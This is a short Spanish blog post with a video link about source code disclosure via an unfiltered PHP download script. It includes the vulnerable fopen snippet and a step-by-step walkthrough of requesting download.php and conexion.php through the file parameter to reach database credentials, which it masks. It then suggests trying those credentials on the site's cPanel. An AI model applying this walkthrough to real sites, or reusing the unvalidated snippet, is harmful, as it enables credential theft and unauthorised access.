Video URL:
http://www.youtube.com/watch?v=s13_lMnREIs
SCD o Source code disclosure, es una
vulnerabilidad que permite la lectura de ficheros que se encuentren en
el sistema víctima, debido a errores en la programación de páginas que
realizan descargas de archivos. Esto se da debido a que no se hace un
conveniente filtrado de los datos que llegan del cliente,
permitiéndonos obtener cualquier fichero del cual conozcamos su ruta
dentro del servidor.
Un ejemplo de un código vulnerable es el siguiente en PHP:
$f = $_GET["f"]; header(“Content-type: application/octet-stream”); header(“Content-Disposition: attachment; filename=\”$f\”\n”); $fp=fopen(“$f”, “r”);
En él se observa cómo
se insertan los datos directamente dentro de la función fopen, sin
ningún tipo de validación o verificación, ocasionando que el fichero sea
descargado sin inconveniente.
A continuación presento la explotación
de este ataque en una página vulnerable. Los datos fueron modificados
para proteger el sitio original.
Se tiene la siguiente ruta:
www.ejemplo.com/download.php?file=archivos.pdf
www.ejemplo.com/download.php?file=archivos.pdf
En ella, la variable id recibe el
archivo a descargar, en este caso archivos.pdf, reemplazamos este
documento por el nombre de fichero o página que queramos obtener, para
este ejemplo, el objetivo es encontrar las credenciales de conexión de
la base de datos, para ello le damos como valor a la variable id el
fichero download.php
session_start(); include_once("cms/_includes/conexion.php"); $sql = "select titulo,especificaciones,id from cms_content".$_SESSION['idioma']." where father=21"; $acerca = doSql($sql,1); $sql = "select imagen from content_gallery".$_SESSION['idioma']." where father=".$acerca[0][2]; $imagenes=doSql($sql,1);
Procedemos a descargar el archivo conexion.php
$host="localhost"; $database="********"; $user="*********"; $pass="***********";Despues de ver el codigo fuente del archivo conexion.php como podemos ver solo nos queda intentar acceder con estos datos al CPanel.
Video URL:
http://www.youtube.com/watch?v=s13_lMnREIs
Publicar un comentario